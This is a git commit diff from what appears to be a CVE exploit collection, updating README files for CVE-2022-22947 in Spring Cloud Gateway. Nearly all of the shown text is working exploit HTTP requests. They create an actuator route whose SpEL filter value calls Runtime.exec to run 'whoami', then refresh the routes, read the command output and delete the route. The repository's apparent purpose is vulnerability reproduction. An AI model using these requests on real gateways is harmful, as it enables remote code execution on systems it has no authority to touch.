update README.md

2022-03-04 14:01:44 +08:00 · 2022-03-04 14:01:44 +08:00 · fff9522e83
commit fff9522e83
parent 35d64ea84f
10 changed files with 11 additions and 11 deletions
--- a/00-CVE_EXP/CVE-2022-22947/README.md
+++ b/00-CVE_EXP/CVE-2022-22947/README.md
@ -7,7 +7,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（

 [环境搭建过程](环境搭建)

-服务启动后，访问`http://your-ip:8080`即可看到演示页面，这个页面的上游就是example.com。
+服务启动后，访问`http://your-ip:9000`即可看到演示页面  

 ## 漏洞复现

@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（

 ```
 POST /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@ -29,7 +29,7 @@ Content-Length: 328
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
-    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
  }],
 "uri": "http://example.com",
 "order": 0
@ -41,7 +41,7 @@ Content-Length: 328

 ```
 POST /actuator/gateway/refresh HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@ -57,7 +57,7 @@ Content-Length: 0

 ```
 GET /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@ -73,7 +73,7 @@ Content-Length: 0

 ```
 DELETE /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
--- a/00-CVE_EXP/CVE-2022-22947/images/1.png
+++ b/00-CVE_EXP/CVE-2022-22947/images/1.png
--- a/00-CVE_EXP/CVE-2022-22947/images/2.png
+++ b/00-CVE_EXP/CVE-2022-22947/images/2.png
--- a/00-CVE_EXP/CVE-2022-22947/images/3.png
+++ b/00-CVE_EXP/CVE-2022-22947/images/3.png
--- a/00-CVE_EXP/CVE-2022-22947/images/4.png
+++ b/00-CVE_EXP/CVE-2022-22947/images/4.png
--- a/CVE-2022-22947/README.md
+++ b/CVE-2022-22947/README.md
@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（

 ```
 POST /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@ -29,7 +29,7 @@ Content-Length: 328
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
-    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
  }],
 "uri": "http://example.com",
 "order": 0
@ -41,7 +41,7 @@ Content-Length: 328

 ```
 POST /actuator/gateway/refresh HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@ -57,7 +57,7 @@ Content-Length: 0

 ```
 GET /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@ -73,7 +73,7 @@ Content-Length: 0

 ```
 DELETE /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
--- a/CVE-2022-22947/images/1.png
+++ b/CVE-2022-22947/images/1.png
--- a/CVE-2022-22947/images/2.png
+++ b/CVE-2022-22947/images/2.png
--- a/CVE-2022-22947/images/3.png
+++ b/CVE-2022-22947/images/3.png
--- a/CVE-2022-22947/images/4.png
+++ b/CVE-2022-22947/images/4.png